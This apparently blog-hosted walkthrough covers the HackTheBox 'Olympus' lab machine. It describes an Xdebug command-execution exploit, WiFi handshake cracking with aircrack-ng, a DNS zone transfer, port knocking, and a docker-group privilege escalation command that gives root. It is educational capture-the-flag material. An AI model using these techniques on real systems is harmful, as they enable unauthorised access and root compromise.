Interactive Coloring

drag iconDrag any color from the left toolbar to an area or text in the page. A blue outline will indicate a droppable element.

drag iconOn mobile, wait a tiny bit until you drag the color drop.

Hackthebox Olympus Walkthrough

Initial Foothold – Crete Island

Nmap result:

Port 80 enumeration
– Dirbuster: no interesting page/directory.
– Nikto: found uncommon header xdebug 2.5.5
– Xdebug is an extension for PHP to assist with debugging and development.
– Xdebug < 2.5.5 suffer from unauthenticated os command execution
– Exploit: https://github.com/vulhub/vulhub/blob/master/php/xdebug-rce/exp.py

Running exploit from attacking machine ip (10.10.14.x) doesn’t return any result. Trying from another machine (rooted earlier) return result as below:

Olympia – Enumeration (where is user.txt??)

Airgeddon; Wireless auditing tools (https://github.com/v1s1t0r1sh3r3/airgeddon) and there is a file “captured” in the directory.Copy out the file to enumerate further.

Information obtained from “captured.cap” file:
– A lot of deauthentication, maybe deauthentication attack, one of airgeddon features.
– Ssid name = Too_cl0se_to_th3_Sun ->look like a hint, google it later
– Bssid f4:ec:38:ab:a8:a9
– AP = TP-Link

What next? Cracking the password.
Why? It could be the password for SSH port 2222 (nmap result).

# aircrack-ng -w /usr/share/wordlists/rockyou.txt -b f4:ec:38:ab:a8:a9 captured.cap

password cracking

Wifi password = flightoficarus
If this is the password for SSH (port 2222), what is the username? Enumerate more…

Google: too close to the sun

too close to the sun

Rhodes – SSH attempt
– Username: icarus
– Password: flightoficarus

Rhodes – SSH attempt (revisit captured.cap file)

Ssid name = Too_cl0se_to_th3_Sun -> look like password pattern. Let’s try

rhodes

Result: Welcome to Rodhes!! There’s a hint “help_of_the_gods.txt”. Did you notice the domain name? Since we have the domain name, what we can do with it? Go back to nmap result, remember port tcp53?. Enumerate this port.

Portal to the Hades
– DNS works on both TCP and UDP 53, UDP for address resolution and TCP for DNS zone transfer.
– To perform zone transfer request, few information required.
1. Domain name – ctfolympus.htb
2. @local-server – 10.10.10.83

dns enumeration

Result: Another hint!!
1. prometheus, it could be name of something
2. (3456 8234 62431) –> Port knocking?
3. Again, password pattern.

Portal to the Hades – Port knocking

Nmap result (before port knocking):

Nmap result (after port knocking) -> Noticed the different?

Hades – Welcome to the Hades !! (user.txt)
Try:
1. username: prometheus
2. password: St34l_th3_F1re!

Olympus: Enumeration result
Linuxprivchecker result: user prometheus is part of docker group and docker process run as root.

Google: docker privilege escalation, return a lot of result.

“If you happen to have gotten access to a user-account on a machine, and that user is a member of the ‘docker’ group, running the following command will give you a root shell” – https://fosterelli.co

Command: docker run –rm -it -v /root:/pwned olympia /bin/bash
-i = interactive
-t = allocate psedo-tty
-v = bind mount a volume.

[THE END]

This website use cookies to ensure that you have the best experience on this website.